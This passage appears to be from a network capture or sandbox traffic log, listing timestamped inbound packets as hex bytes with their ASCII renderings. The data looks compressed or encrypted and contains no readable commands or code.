4e 60 a0 Data Ascii: ByfIpNG?'jT(-!kB(}]9mHM"N2rw@wN+jaYP.k$riyf4f'93(Im>wRXUh41)CwC09]/vsp.zoHl?n\|]^={CX\;\4N`
2023-11-18 09:02:40 UTC	6700	IN	Data Raw: 29 9d 6d d1 79 ec ed f7 39 d6 d2 2e c3 53 f4 0f fd 42 84 39 1a 02 ef f1 20 01 96 62 62 46 db fe 68 66 64 ad 2d ab a6 2e 89 24 84 57 ef a7 5e bc d7 86 7a d1 08 dc 97 85 db e5 2c 0b d2 c1 7b b9 10 47 fe 2c 9b e8 5d f1 ca e3 d8 c2 40 56 dc 7d 0a 2a e8 c7 2b 0e 9a 69 82 f8 8b 6f e4 0b 9f 6b 71 07 34 1a 8b b8 eb a1 d0 99 2a 28 b4 c4 a6 c1 9d 69 49 95 99 1f ed ea f6 00 20 ce 1e d8 68 21 d4 15 7f 7c 60 0f da 99 fe 69 78 b4 9d 3d fa 48 22 46 87 7d 7c b5 b2 4f ed 7c 16 8f 69 a5 10 c3 ce ff a0 e4 b7 62 5a 45 31 a9 8e c8 cc b1 99 cd b1 98 4c 62 d6 a6 72 52 dc 53 45 23 81 63 5e c9 10 56 64 16 ef f9 fd fc 85 4c fe 42 35 bf 6c 07 3f 5f 3e dc 0d f3 c4 70 df d7 7f 04 a4 b0 1b ca 6f e4 e5 93 78 f9 47 23 af 88 f2 8b 78 79 cf 83 40 74 11 e6 b9 2d 67 95 fd 49 78 95 3f a1 d9 Data Ascii: )my9.SB9 bbFhfd-.$W^z,{G,]@V}+iokq4(iI h!\|`ix=H"F}\|O\|ibZE1LbrRSE#c^VdLB5l?_>poxG#xy@t-gIx?
2023-11-18 09:02:40 UTC	6716	IN	Data Raw: 43 10 6d 0f e9 4f d3 b5 f7 34 f4 39 d8 19 06 73 a5 96 fb 2a 32 91 25 5c a1 47 fd 5c ad ed 43 19 44 92 02 77 f1 71 ad 70 36 b3 51 87 ef 54 97 af 0f 8f f8 1f 47 70 c4 8a 2e 59 3f ff 20 26 3a bf 5b 4e fb ca e7 f1 97 19 1d 21 b1 7b ed 6f 76 86 f4 ff bd c0 f3 ef 3c 4e ed 2f 6a 4d 2a 65 bd f5 bf 86 e9 5a d8 3d e8 8e 82 c9 95 69 9f 75 84 2c a7 00 d9 62 fd 56 7f 81 cd 77 b7 e2 9b 6c 53 97 41 3e 58 ad a2 ba 33 24 5d bd d9 10 0e 99 41 01 fe 7f 46 1c e6 18 48 f3 1e b6 14 b9 76 6c c6 4e 46 6f 1b 90 a3 ef 54 a0 dc 8e 65 41 4a 9c 29 9c 4f a5 1b c8 66 fd 96 ba bf d3 89 1e 98 e9 d8 17 c4 c2 7f 42 57 a8 5a 30 f3 20 b5 f0 41 8b bb ed dc 3c f8 11 b7 06 0e a3 38 34 57 03 83 29 93 cf 70 34 f1 ab 6c e7 dd 8c 5f 8d 55 b4 f7 aa 2e 3d 8d 3f 35 d3 57 86 10 1c 64 09 2b 71 d2 5c 3c Data Ascii: CmO49s2%\G\CDwqp6QTGp.Y? &:[N!{ov<N/jMeZ=iu,bVwlSA>X3$]AFHvlNFoTeAJ)OfBWZ0 A<84W)p4l_U.=?5Wd+q\<
2023-11-18 09:02:40 UTC	6732	IN	Data Raw: 93 d8 e9 cc 03 73 5b fc 4e 2c 43 34 9f d4 c4 aa 92 a3 d8 81 25 a1 db 0e 7f 52 49 86 4f a2 23 47 bf 63 22 3a 12 09 b3 79 8f f8 cc 5b 56 e1 52 e2 6c 6a 71 e0 6e d9 3a 31 00 a7 6b 78 c6 02 09 a7 f9 fb 60 4f 72 a1 45 d3 bf 19 1b 90 e7 f5 20 79 92 f6 d1 ba b1 5d cc 47 39 be 65 3a c5 ac 9d 01 d4 38 2b 20 ae 65 51 ad 3d 4d bd fc a5 88 9f 88 36 61 b0 b5 0c 93 5d 75 0f 6d 61 17 53 1f f0 e5 44 dc a9 6c e0 6e 7f 5d 3a 9d 9f d1 d8 cb c1 c2 51 a6 ad 16 21 33 c9 7e 69 0b dd d8 26 89 81 d9 eb 60 c7 15 aa f3 26 8f 8d 30 8b ef 5a 67 05 f4 fc 2d de 73 a7 7c fe 53 d9 e4 4d 5b 1d 5b c3 e4 1c 16 40 e9 51 e8 12 13 03 4c 5f b3 fb 4e 8d fe 38 f7 4f 9f 87 73 f1 76 fb c3 58 4d 51 1b d3 70 89 54 8d a7 a2 c9 2b 2d 40 a4 df 68 52 bb 75 ab e3 64 f6 28 f7 1b 9c c0 b9 b3 a0 c9 71 4f 01 Data Ascii: s[N,C4%RIO#Gc":y[VRljqn:1kx`OrE y]G9e:8+ eQ=M6a]umaSDln]:Q!3~i&`&0Zg-s\|SM[[@QL_N8OsvXMQpT+-@hRud(qO
2023-11-18 09:02:40 UTC	6748	IN	Data Raw: 27 4f 42 29 73 e3 e9 36 90 3d b6 4e 04 9e 7b 3a 47 11 3b d7 55 c0 07 94 1b 5d 5a c9 93 14 36 f4 81 64 69 a2 a1 ab 33 78 b7 14 7f 46 c4 8a 2f 1c 63 ac 58 c4 50 4e 3c 67 d9 c5 8d a2 25 20 b3 25 26 13 39 0a 43 2f 1f 28 b7 51 99 2d e5 32 ab 3d 96 73 5c a8 3b 00 14 20 2e ec 98 c1 e4 16 3b e8 d1 28 1d 1c c6 c4 a4 ae 1c f5 7f ab 50 87 db 79 3c bd d8 f1 6f 0a bd 14 39 b7 1c fd 2e 49 bf f7 b6 a8 05 54 c0 31 70 eb fa fb 06 36 dd 2a d1 ee d7 33 8b a6 72 5e 83 d0 43 56 e7 38 c1 9a 34 c1 ba 53 58 b1 19 7a 9f b3 13 84 0b ad cf c2 8a 09 d0 bb d0 f3 31 7b e6 7d 83 fa 95 4c 92 de 1e 05 b3 c9 23 6a 3b 85 7d 50 b9 64 da 64 29 96 bb 29 5a 8e 4f c8 fe f3 94 bc a0 0d 8b 1f 89 ae ab e4 b9 19 75 47 59 b4 7b 98 ba 07 71 25 5e 53 e6 a7 aa 7b 31 0a 27 71 7f 5d 0a cc 16 96 a3 a1 f5 Data Ascii: 'OB)s6=N{:G;U]Z6di3xF/cXPN<g% %&9C/(Q-2=s\; .;(Py<o9.IT1p6*3r^CV84SXz1{}L#j;}Pdd))ZOuGY{q%^S{1'q]
2023-11-18 09:02:40 UTC	6764	IN	Data Raw: 5e 55 2a 80 74 a6 c7 c1 97 14 b4 93 98 3f 97 a3 28 a1 9e 45 49 ea a9 50 ea 09 4f 89 cf 57 3c 24 01 fe b1 24 f0 d9 2a 7c cb c5 38 f8 82 4b 80 ff ea 35 05 fe b5 18 3c 4c b3 50 1f 8e fe 1e 77 99 7f 03 28 34 ae 87 9a f5 04 ec db 7b ac 09 77 e1 26 88 97 99 ce bf c3 c1 25 15 c8 01 ef 0e 28 f3 9a 28 f3 6c bb 11 b7 cf 65 a4 a1 00 65 31 d3 c9 de 5f 4f bb 79 96 28 a3 7e 97 e8 f2 f6 ad 54 e6 3e b0 62 f3 9d 59 6e 46 8d 09 a2 f4 69 18 97 29 9f 8e d5 c8 6f b0 ca e9 c4 bb 3d 55 a4 9f a0 bd 0f 1b d1 c6 60 85 f0 1e be 8b 6f 23 b1 72 6d 10 ec a1 79 40 f7 9a 4c 71 bb 28 af 06 90 90 f5 ab 40 22 97 06 72 b8 98 a2 c6 2f 61 78 35 4b 60 93 86 df bf 18 ef 8f e9 a4 52 b8 6f 95 69 db b1 8e 86 f2 5f 10 2d 38 36 db 33 66 d2 eb e5 42 18 9b 96 b0 88 0b 93 2c 62 f7 57 95 45 1c 2f 00 a7 Data Ascii: ^Ut?(EIPOW<$$\|8K5<LPw(4{w&%((lee1_Oy(~T>bYnFi)o=U`o#rmy@Lq(@"r/ax5K`Roi_-863fB,bWE/
2023-11-18 09:02:40 UTC	6780	IN	Data Raw: 34 79 69 1c ff b8 13 6d 5e 92 6a cc 88 87 cb 26 0b 91 20 ca 59 85 1e e7 ae ab 39 22 bf 67 0c 9d 1a 61 fe 0a 73 91 ec f1 e8 b6 89 3e 6e 96 ad d9 7b 29 c5 e8 98 b9 8e 04 f4 6d 8b 72 50 1e ed 7c 1d e7 49 00 7f 9c e2 a7 da 34 eb 2d 37 a1 70 a2 0a 7b d7 62 35 c2 9e bb 05 90 b3 aa ba 89 10 5d 50 5b 61 de dd df 13 0b 00 57 bf ca 65 d8 eb 84 7d 35 e6 87 5b 2d 88 6e 31 50 06 37 91 7a f4 7b 49 24 62 2b 02 18 7d 98 02 75 ce 0e f1 08 f2 14 a2 c3 4f 1d 8e 8e 76 5b 76 6a e7 53 fd b7 38 9f 5a be af 52 bf d7 c5 be 40 c2 e3 38 45 27 73 43 9d 1c 80 e2 9d cf a2 dd 11 d5 ae 14 7d 0e 9f 02 a3 9f d2 f5 79 b3 d6 e7 15 88 a0 63 ed 14 0f 86 f3 e7 8a f7 f1 c3 b4 eb cf 48 3a 4c 1c 31 a6 9c 27 2d 88 43 a5 74 ce 13 6a 6a 34 c4 11 14 d3 ce 74 1e 0e 2a 95 3d 03 3c dc c9 f7 89 5d 16 7c Data Ascii: 4yim^j& Y9"gas>n{)mrP\|I4-7p{b5]P[aWe}5[-n1P7z{I$b+}uOv[vjS8ZR@8E'sC}ycH:L1'-Ctjj4t*=<]\|
2023-11-18 09:02:40 UTC	6796	IN	Data Raw: d8 fa a5 ff 18 9c 77 ac fe 0b ff f8 ab f6 db bf be 6f ce fd 37 dc e0 df 71 e5 ff f9 50 34 fc be 1b cf 3d 50 b4 f4 9a ab a2 77 56 54 5d f9 8d 3f 5d f9 ad cd 37 36 ee de b6 a3 a8 f2 47 3f eb f9 8f 7f fd e2 da bf f9 f5 86 f8 17 77 ff fc f6 f5 0d d7 f5 fc a8 55 9b f3 e3 8e 1d 37 cf 7f 6b c3 4f bf e5 7b 6f e2 99 eb 3c eb 3f b1 60 c9 43 8b 3f f4 87 17 7e 57 fc bf bc c1 4f de f6 6c e7 b2 e5 fb 9e fe ca 60 ec c6 75 a7 1f ff e1 c6 d8 d7 7f f1 5d ff 77 f7 6e f7 e4 37 3c 31 72 fe c5 9d 7d eb cb 9f 19 fa 79 ea 45 a8 27 37 ff a0 7c e3 63 37 7f fc 9d 64 1c 39 1c af d1 7e 4a 9e f5 20 7b d6 bd 5e 3c 5c 96 92 c0 25 22 88 d8 6e b5 39 98 59 0e 48 f9 47 df 15 f6 f3 8f ae 8f 2f 77 ab 4d f1 87 3c 6a 23 56 55 a8 2d b8 b7 9b 1b 9e dc e7 8d 2f f7 61 97 9f 77 15 f1 2e 3c 2d ad 38 Data Ascii: wo7qP4=PwVT]?]76G?wU7kO{o<?`C?~WOl`u]wn7<1r}yE'7\|c7d9~J {^<\%"n9YHG/wM<j#VU-/aw.<-8
2023-11-18 09:02:40 UTC	6812	IN	Data Raw: f9 cf 7f 64 3f 6d ed 8a ef 27 b0 51 9b 6a 6a 19 ef 67 7c 3a c8 7e 8a 8e 4e d8 4f e2 bc 5d 6e 5d f8 43 ae 96 06 a6 eb d5 ec 27 3b 8b 18 4b 35 b6 c2 5c f8 78 19 d3 bf 7b 88 78 4f 43 e3 bc c2 86 bd c1 8b 0b 9d f7 5c 1b 2a 65 df 4c 9f 34 b2 cd 89 f9 b2 10 f5 9e 72 0a 42 95 50 ed 93 19 46 91 a7 18 e0 c9 34 b3 25 75 2b cb ad 74 cb 42 bf b9 23 09 d7 96 3e 39 27 41 58 e7 18 65 6f b3 b0 ce 89 be 62 0c 0f bb 1c 49 f7 55 ac 42 07 6c dc ad cd c5 4b 6e 3c 59 c3 57 c3 a3 21 7d b5 71 fe d8 9d 53 8c ff 9e 37 08 ff bd db b6 bf de 7b 8b f7 57 9b 1c 54 fa 4b 58 43 22 24 4c f2 b0 a7 d7 88 eb de 34 d0 e9 04 3f 5f 16 e5 83 c5 0c e3 1b 5b bc a7 7a 96 a4 2d 0b 59 58 de f5 9b dc c4 48 1a 36 06 59 88 5e 93 24 44 33 ef 25 39 58 02 6f 9f cb 50 f1 7a 8f 90 c7 ec bf 6d bc a1 0f 71 80 Data Ascii: d?m'Qjjg\|:~NO]n]C';K5\x{xOC\*eL4rBPF4%u+tB#>9'AXeobIUBlKn<YW!}qS7{WTKXC"$L4?_[z-YXH6Y^$D3%9XoPzmq
2023-11-18 09:02:40 UTC	6828	IN	Data Raw: c3 aa 79 e5 fa 3c 97 da a8 f5 47 87 c3 bf a6 51 a9 6b 72 15 b6 07 bf 56 78 7a cd c1 ba 88 42 7f 9e 75 41 38 54 fa 28 f6 5b f8 e3 34 99 64 d7 6d 3c e5 a6 69 0d 0d 95 99 da 88 98 cd 03 fe 7e 3e b1 14 03 fc 1f 91 fc a6 94 88 e0 4e a2 eb 1f e8 27 ab dd 85 e1 79 67 ea b3 5d a1 a2 06 06 b0 f2 4a 28 33 99 fa a5 a1 1b cc c2 8e 9a 53 b5 51 71 16 19 5f bf 1e 8e 60 af 10 40 57 ba 00 8d 48 f3 cb 7a a5 02 80 9c a1 0a 33 ba 32 5e 1f fe 42 dd 37 6b 5d 96 00 21 60 0a ec a1 36 10 91 5e c4 85 cc 66 2d 18 64 77 32 eb ea c2 a8 0b 5a c4 1d 67 dd 43 6e 47 f0 db 50 dc ff 00 2c 4b 7b 12 55 c0 42 b8 2c a7 53 76 c7 c2 c1 5f 28 e1 ac 11 7e fb 60 3f 5b 22 2e 2a 71 85 7b d3 10 94 52 de 3f 7e bf 6e 65 41 cc be 5f d7 a7 cc 3b 1b ea b2 dd 43 48 9a 10 7c c3 86 e0 d8 90 4d b4 07 be 60 17 Data Ascii: y<GQkrVxzBuA8T([4dm<i~>N'yg]J(3SQq_`@WHz32^B7k]!`6^f-dw2ZgCnGP,K{UB,Sv_(~`?[".*q{R?~neA_;CH\|M`
2023-11-18 09:02:40 UTC	6844	IN	Data Raw: d7 a3 3e a6 ce 30 ec 07 f9 ca 36 34 92 73 e1 66 af 3a da df 2e c9 a7 1d 0f 0f bf 1c 1e 72 c1 06 23 0e 0f 39 74 83 d1 32 1e b2 93 89 e7 2b 2f 8e 1f 8d 45 b6 d1 b8 ee e5 ab c1 43 4a ff ab f0 b6 3e f8 5c 93 81 38 b8 07 dc 22 f3 c7 a0 0f 71 71 64 f0 7d 37 2e d7 26 fd b9 ba fa 00 84 4f 7d ed c6 78 bc 6a df d4 2b e0 55 7d a3 1a e3 f1 aa 33 fa b0 96 f0 aa 05 ad 8e c7 12 db 78 38 5f 6a 75 3c ae 12 ff b9 66 bd 11 8f ff 9c b1 de 68 09 ff f9 58 ab f4 3c 6b a3 67 d6 7f fe bf f1 9f ed 12 f1 9f c7 f4 96 f0 9f 73 5a a5 27 62 a3 e7 bb 55 57 83 ff 6c 91 1e 9f c0 17 d7 58 f4 e0 3e bb fe 7b a0 c7 97 48 8f d6 2a 3d 4b 6d f4 3c 7c 19 7a 7c 97 a7 27 85 e8 29 7e df 9a 2f 3c d3 f4 86 0b 63 53 12 e9 59 d3 2a 3d aa 5d fe bd d8 3a 3d 29 57 83 77 1e 9a c4 e2 d6 f7 cf 47 f4 96 d7 f7 Data Ascii: >064sf:.r#9t2+/ECJ>\8"qqd}7.&O}xj+U}3x8_ju<fhX<kgsZ'bUWlX>{H=Km<\|z\|')~/<cSY=]:=)WwG
2023-11-18 09:02:40 UTC	6860	IN	Data Raw: a1 0a 6a f0 44 79 d9 f8 5c c5 cd fb 00 0c 95 44 a9 f2 89 10 bf f5 22 3f 5c 83 dd be b5 3b a6 3c 63 2c 78 61 2c 53 4d e1 10 d4 9d e5 fd d0 bc a2 0a 3e 3c a5 44 30 62 a9 7c 8c 0f 4b 16 8c 0b e9 cf 19 82 31 8d fe d4 0b c6 0c fa 33 49 30 ae a0 3f 13 05 e3 6a fa 73 9c 60 5c 47 7f 8e 16 8c 1b e9 cf 91 0c 63 86 6f ca 23 49 c2 7a c1 53 05 57 de 0d 8c cc 44 c2 dd 3c 1f a9 06 df 9a 91 1e e0 56 33 52 03 c6 65 22 61 d2 e6 23 61 b6 e6 23 bd c1 7b 66 24 4c d3 7c a4 56 08 f3 e5 23 7d 85 30 3f 3e d2 4f 08 f3 e7 23 fd 05 b4 59 8a 0c 14 d0 46 29 12 26 5f 3e 12 f4 8b 55 30 6f 41 9d e5 b5 5d d9 bb 12 6f 99 7e 34 67 72 47 fd 82 e9 66 cc e9 a6 7b d0 ee 04 21 9f 11 8c 74 c2 8c 04 4e 06 8f 2a 14 25 87 5d 38 d3 f5 4a b0 c4 91 c0 47 6b 2a 2d 60 8c 67 2f d0 3c 3d d1 b5 5b bb 13 ba Data Ascii: jDy\D"?\;<c,xa,SM><D0b\|K13I0?js`\Gco#IzSWD<V3Re"a#a#{f$L\|V#}0?>O#YF)&_>U0oA]o~4grGf{!tN%]8JGk-`g/<=[
2023-11-18 09:02:40 UTC	6876	IN	Data Raw: 71 5e 17 ca 66 74 5a d3 8a 4e 1c a7 b6 44 a0 d3 db 0f 36 e9 c1 99 5c 2f ad f4 0a 4e d0 85 fb 48 28 67 4b 1b e3 b9 50 b4 7f 84 52 16 b5 67 ff 48 bd e7 08 bd 89 80 3a 1f 41 c9 67 06 74 af 6c 1a 75 e0 ab 81 00 73 5c 14 07 fc db 81 8c e0 a3 7e 92 e0 ff 48 42 82 f7 24 a5 ff 09 54 d3 de 6d 4a cf d0 8b 55 da 73 db 18 de ef 10 52 5b 37 90 db 33 7a 7a 1e 03 f2 6d 26 29 a1 95 dc 8e 89 e2 55 74 a7 f5 3e c8 ea f5 56 84 4e d0 fd ea 4a e9 50 ee 25 74 e8 a7 47 e8 d0 0e 9e ff aa ee 74 94 3b 0d fc 19 78 fe 70 7e 10 89 3e 91 d0 c3 49 e9 91 cd 0d 4b 18 2e 4f 94 3e ef 6b 17 b2 ad 49 b8 fb 81 cf 98 0d 69 37 94 d2 2e 1b 69 f7 e7 5e e7 61 f6 53 2c 98 23 2e 0b 7d 50 9b 78 b4 b4 3d a4 9c 37 24 2a e5 46 09 cc c6 7d 93 83 87 b6 ab ad 14 f0 61 21 bd d6 cc 6f 22 a0 59 26 99 2d 85 64 Data Ascii: q^ftZND6\/NH(gKPRgH:Agtlus\~HB$TmJUsR[73zzm&)Ut>VNJP%tGt;xp~>IK.O>kIi7.i^aS,#.}Px=7$*F}a!o"Y&-d
2023-11-18 09:02:40 UTC	6892	IN	Data Raw: c3 e7 0a 77 6c 30 84 cf 54 6d 40 d4 6f 1a 90 19 2d 7e d3 aa 9e f8 8d 6b ef 3a 77 6c 30 6a 7b 06 ed d4 ae 50 db 99 d1 18 c3 07 ea b8 a5 57 1c 27 c1 6f 2e e1 25 8b cd a2 86 97 a7 9e 4f 82 5f 6a af d2 61 80 5f a3 76 be 79 26 29 7e 77 a5 1b e3 77 e5 ee 9e f8 35 58 6f cb ca 70 bd e5 f1 f5 e6 d0 c6 04 e8 49 40 cd b6 e7 12 d6 1f f4 bf 8e d6 1c 37 c4 86 9b 8f 0c 34 42 a9 bf f6 40 8f fe a1 fc c2 24 e5 dd 93 8d cb 57 24 29 df 38 c1 b8 7c 66 b2 f6 a7 18 97 7f f2 6c e3 f2 4d 25 c6 e5 67 26 29 5f 5f 6e 5c 3e 2f 49 f9 ed e3 8d cb db 92 b5 9f 04 3f c5 5f 1d 55 8c ca 9b 92 c0 9f 9e a4 7c 53 99 71 79 69 af 71 79 47 12 f8 d7 25 29 df 94 04 3f 6b ae 4c 32 5f 49 e6 b7 36 49 79 53 12 f8 8b 93 94 2f bd 26 09 7e 92 b5 9f 04 fe e2 d1 c7 0d c7 5b 9f 04 3f e9 49 ca bb 27 19 97 ef Data Ascii: wl0Tm@o-~k:wl0j{PW'o.%O_ja_vy&)~ww5XopI@74B@$W$)8\|flM%g&)__n\>/I?_U\|SqyiqyG%)?kL2_I6IyS/&~[?I'
2023-11-18 09:02:40 UTC	6908	IN	Data Raw: c4 fe 22 6d 36 90 17 5d e4 1d 57 ef e6 79 c6 91 2a b7 ae e9 af a5 e0 11 42 19 0c 4c 2b 8f db cd ef 03 20 79 1b 25 af ec 49 c9 ab 8d c9 0c c4 7f f3 e4 53 6d 48 2a d2 dc a7 42 36 cf 6f 6d 10 38 d0 93 00 40 f8 f3 43 cb 9f c6 27 0f 23 5e ab c8 86 2a 3d 76 ea e3 94 9a 11 3b 75 26 a5 66 c5 4e 1d 4b a9 c3 11 80 61 78 91 1c 2b 9b 9d b2 e5 c4 4e 6d 4f a9 63 62 a7 aa c4 80 e6 c5 4e dd 46 a9 f9 b1 53 57 53 6a 41 ec d4 27 29 b5 30 56 aa cb c9 52 8a 62 a6 dc 01 db 61 cc 94 e1 2c 65 5a cc 94 cb 58 ca 8c 98 29 70 35 35 bb 74 35 46 d1 93 8c 98 c0 8d 5b 2a 2e 27 44 e9 d2 4a d6 dd a0 34 e4 bd 06 fc 89 fc e0 7f 9a 72 ab ea 90 9f 10 cb 96 f7 01 41 59 85 b6 11 2c c1 c1 13 52 96 5d cd bf ac 0d ec 28 c1 ce 00 36 8c bb 2f c3 85 3f 85 55 e3 2a 04 a4 75 da 4b 04 66 1f 57 3f e6 3a Data Ascii: "m6]WyBL+ y%ISmHB6om8@C'#^=v;u&fNKax+NmOcbNFSWSjA')0VRba,eZX)p55t5F[.'DJ4rAY,R](6/?U*uKfW?:
2023-11-18 09:02:40 UTC	6924	IN	Data Raw: b3 b1 6e a8 a5 e8 a5 47 09 6d a1 eb 98 fe 3e 07 ae 1d 8e 76 1c b1 f9 f5 6d 0a 87 fb 39 7f 1b 55 35 76 0e c6 50 35 27 3d ed 25 9f 41 43 5b 58 43 0f 91 f2 a1 3d 34 ce 47 bb d3 4e a3 02 9b b7 91 b7 72 46 7d 9b 62 64 63 62 65 aa a0 8c ad 47 19 aa 3f a5 e1 98 53 30 94 8e 73 08 b9 84 94 0c 24 a2 2c b0 c6 90 ee 6e 05 8b ab fc d1 78 2f 86 ad 57 7f 84 f8 38 a8 11 a7 61 76 92 e5 03 7f c7 3b 53 12 48 38 e7 e1 83 ad 9e 26 67 34 9e 1b 86 8a 48 12 af d8 93 97 46 94 68 b0 15 78 eb e8 40 7f 7a 1f 35 09 56 c4 89 f1 df e1 3d 0f 67 61 23 25 bc 8f 9a 51 41 0d f0 b3 99 7b 60 7e 42 97 a2 dd 6c 22 e2 10 ff e5 5c 06 18 44 66 80 5c ee 43 1c e2 77 14 cc 8f 50 44 0e 73 c9 bd 8a 62 10 0b e0 76 70 1f 2a 84 c6 d1 8b 42 12 dc f6 48 e5 85 4b 91 9e a5 73 c8 cf 18 40 22 78 33 40 b1 de ed Data Ascii: nGm>vm9U5vP5'=%AC[XC=4GNrF}bdcbeG?S0s$,nx/W8av;SH8&g4HFhx@z5V=ga#%QA{`~Bl"\Df\CwPDsbvp*BHKs@"x3@
2023-11-18 09:02:40 UTC	6940	IN	Data Raw: 7a 75 5e a7 43 97 41 08 4c f5 4f 17 64 89 96 9e 4a bb 12 07 b3 00 08 c6 12 35 9b 9e c6 17 d0 ec cd f4 67 0e 86 24 e8 61 84 06 d7 6a d2 6d 2f e0 64 67 77 4b 0f 90 c5 9b 4a 98 a8 ea 74 1c 8c 4c ad e8 99 0a f4 5e 14 82 22 9e bb d7 08 d9 57 44 4f 3d 42 3a f6 85 03 cd 66 77 60 aa ab 73 48 c9 49 7f de 7e 57 67 42 49 a3 63 9c 74 98 b0 9d c5 31 5e fa 96 98 2e 46 d6 23 53 23 dd 00 9a 22 ed bc bb 23 6e 85 d5 7d bc 2b b0 80 6e 7a ac 2c 56 ca f2 bd 66 06 2e 24 66 a0 5c 2d 1f 72 ef 06 10 a9 dc 43 dc 79 2b 19 40 e7 00 a2 db d2 05 64 98 c0 30 26 80 60 b0 99 d1 06 cc 48 2b cd 11 86 64 05 ef 16 33 27 cc 02 66 53 05 0a 3b e8 7b ae bb c7 38 67 18 41 d6 b5 73 f1 8c b8 92 51 f0 7a 0f 12 2d 8c 44 98 03 b4 c0 66 90 f1 92 be b0 d7 67 77 13 e3 0d 40 8f 3f d6 e9 25 ed 8b de 72 b8 Data Ascii: zu^CALOdJ5g$ajm/dgwKJtL^"WDO=B:fw`sHI~WgBIct1^.F#S#"#n}+nz,Vf.$f\-rCy+@d0&`H+d3'fS;{8gAsQz-Dfgw@?%r
2023-11-18 09:02:40 UTC	6956	IN	Data Raw: c3 65 7e 66 3f e4 3d d4 2c cb fb 49 59 de 6b 9a c8 fb 60 95 29 cf 2d ef da 3b e4 dd c0 e4 bd c6 36 c4 4b de 23 b5 f6 3d 26 2e ef b1 5e bf 75 45 6c e1 d5 1c aa 48 fb 55 2e ed dc df da 4c 15 dd ef 9f 4a 42 dc a8 c8 7b e3 5d e4 fd 8d 26 f2 1e f1 af f2 ee 72 cb bb b0 87 e4 5d e5 96 77 fb bf ca bb 6a 1f 97 f5 bd ad 8f e9 2b a5 43 1d 6b c5 c5 e4 fd 8b f6 4b 36 95 fd 34 76 4e e1 62 2e fb 6b 65 d9 7f c5 6b ff ad 2c ff a7 64 f9 2f 65 22 3b f8 2e f2 9f ef 50 71 f9 97 6b 88 f7 00 3a 1a cd bd 69 94 ca cb 2b 8c cb 7f a1 77 64 a2 e5 47 26 ff 83 3d f2 9f e7 e3 78 f9 1f f2 1f e9 25 ff 2c df c6 c8 bb cb 3f 84 73 10 eb 03 a2 85 3a b3 97 9c 4a 87 a4 1c c7 64 1e cf 3f e4 9d 6c b7 c8 aa 31 9f cb bb dd ba 98 77 17 d7 16 fa 87 0b 33 3b 4c fb 2e a2 5c dd 78 a7 3b 91 cc 51 d0 45 Data Ascii: e~f?=,IYk`)-;6K#=&.^uElHU.LJB{]&r]wj+CkK64vNb.kek,d/e";.Pqk:i+wdG&=x%,?s:Jd?l1w3;L.\x;QE
2023-11-18 09:02:40 UTC	6972	IN	Data Raw: 56 3a bb 6c 08 d9 86 e4 c7 6c 63 bd fd 4e 73 ba 4c 29 9f cf 5f 06 cb 56 22 0d 87 d8 24 9e 94 eb 65 25 32 a6 89 95 c8 bb 6d f8 8c 41 4e 11 19 fc 68 e8 7c 34 66 5b b0 9c fb af b2 92 4f d3 22 32 ca 93 4a 2c 05 c6 36 ce 76 2c 1d 8a 3e 27 ec 98 7e df 1c bf b4 08 c1 58 c9 ad f1 33 69 fd 39 80 66 a5 75 59 96 22 63 a0 93 8c e8 00 01 fe d3 4c 91 03 05 e3 f5 dc 5c b9 7d ed 91 48 35 6d 40 61 e1 8b 29 82 35 02 83 77 35 2b 4b 12 37 b1 64 d6 93 21 e2 c6 61 3e b4 ac 6a c9 80 66 a4 35 6e 97 2d da 37 ec 98 ec a7 a2 8f 8f 94 2b 6e 24 4a 43 6b 47 95 e2 c6 0e e2 c6 ec b4 cd 6b 28 c6 8c 44 6d 17 d1 42 fb 87 a5 c2 8c 78 6d b0 ae c8 9c 65 78 94 8e c9 97 fe 22 73 c7 60 67 37 b7 bd 73 0e cd 6f e3 dd a0 b6 b6 7e 6d 69 9a fb 01 64 25 62 af e1 3c 3f 00 5a 2a 31 9d 3a 49 f2 95 56 9b Data Ascii: V:llcNsL)_V"$e%2mANh\|4f[O"2J,6v,>'~X3i9fuY"cL\}H5m@a)5w5+K7d!a>jf5n-7+n$JCkGk(DmBxmex"s`g7so~mid%b<?Z*1:IV
2023-11-18 09:02:40 UTC	6988	IN	Data Raw: 9d bc 06 ad 9d 06 06 d7 1c ec 79 36 18 4c 0c d8 e7 27 60 ac 33 32 33 85 4c 30 cd 16 60 1a e3 a1 9d 1f 01 53 59 00 c6 f2 3c 58 d7 b3 60 41 37 c0 c0 5e 00 5b f8 02 5a bc 1a 6c 68 3d d8 f3 11 b0 80 a7 c0 6e 52 c1 48 5e 05 83 bd 0c c6 13 0c 16 56 01 36 f3 0d 58 c1 00 b0 d9 7b c0 00 7e 07 6b ab 01 a3 96 c0 ba 4e bc 0e 70 05 63 ee f4 0b 94 01 58 d6 56 b0 85 3f d2 a1 cc 89 3a 13 55 22 ba 4d 34 85 e8 08 51 48 a2 54 44 c1 68 78 40 54 97 68 30 51 2e a2 56 44 db 88 9a 12 65 26 1a 4a 94 90 e8 0f d1 2c a2 a2 44 73 88 12 12 4d 21 1a 4a 94 9d 28 07 d1 6b a2 33 44 e7 68 18 41 d4 9d e8 3a 51 33 a2 ca 44 13 89 7a 12 cd 21 da 42 43 08 a2 91 44 d3 88 3e d3 d0 82 28 20 d1 67 a2 ba 44 2f 89 6e 12 d5 21 6a 4c f4 9c e8 1d d1 5c a2 73 44 4f 89 ae 11 a5 26 da 44 f4 9b e8 22 d1 69 Data Ascii: y6L'`323L0`SY<X`A7^[Zlh=nRH^V6X{~kNpcXV?:U"M4QHTDhx@Th0Q.VDe&J,DsM!J(k3DhA:Q3Dz!BCD>( gD/n!jL\sDO&D"i
2023-11-18 09:02:40 UTC	6992	IN	Data Raw: 8d 58 7b 11 06 1a b3 f2 b1 bb 11 eb 2a 42 77 23 d6 23 cc 37 62 bd c3 f1 1b b1 88 34 e4 4f 9f 65 88 30 dd 80 65 86 b0 c4 88 d5 0e 61 94 31 cb 1e a1 dc 88 d5 1f 23 94 3f c2 6c 68 77 d8 ce 62 a9 11 e6 42 b9 60 ff 26 ac 2c 84 ee 2c d6 66 84 81 2c d6 21 2c 6f c0 3a 8d e3 61 b1 2e 23 cc d4 63 3d c2 fe 0c 58 6f 10 12 fa ac 2f 08 8b 0c 58 ba a3 91 bb 11 ab 11 c2 6c 23 96 15 c2 dc 86 2c 47 84 25 86 2c 0f 6c 37 62 85 22 2c 32 62 c5 8c ae 63 0d bf da 42 3b 3d c5 42 9f 71 e9 b1 c8 8d e0 0f 63 53 e5 61 6c 6a 11 d0 f7 a1 34 95 0d 67 53 d9 80 fc 61 55 b4 28 8c c6 96 35 f8 fc 61 55 7c 0d 69 ec f3 87 d0 f4 3b 